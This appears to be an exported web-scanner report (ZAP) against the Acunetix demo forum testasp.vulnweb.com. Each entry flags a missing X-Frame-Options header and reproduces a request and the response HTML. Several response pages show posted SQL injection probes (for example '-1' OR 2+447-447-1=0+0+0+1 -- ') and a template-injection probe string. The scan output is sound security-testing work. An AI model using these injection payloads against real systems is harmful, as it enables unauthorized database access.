<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3*2>(0+5+998-998) -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=68 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=68 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=68 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:57 GMT Content-Length: 3083 |
Response Body - size: 3,083 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:18 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 2+689-689-1=0+0+0+1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=69 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=69 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=69 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:57 GMT Content-Length: 3083 |
Response Body - size: 3,083 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:19 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3+689-689-1=0+0+0+1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=7 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 415 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:48 GMT Content-Length: 3164 |
Response Body - size: 3,164 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=70 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=70 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=70 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:57 GMT Content-Length: 3081 |
Response Body - size: 3,081 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:19 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3*2<(0+5+689-689)</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=71 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=71 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=71 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:57 GMT Content-Length: 3081 |
Response Body - size: 3,081 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3*2>(0+5+689-689)</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=72 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=72 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=72 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:57 GMT Content-Length: 3088 |
Response Body - size: 3,088 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 2+447-447-1=0+0+0+1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=73 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=73 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=73 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:57 GMT Content-Length: 3088 |
Response Body - size: 3,088 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:21 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3+447-447-1=0+0+0+1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=74 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=74 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=74 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:57 GMT Content-Length: 3086 |
Response Body - size: 3,086 bytes. |
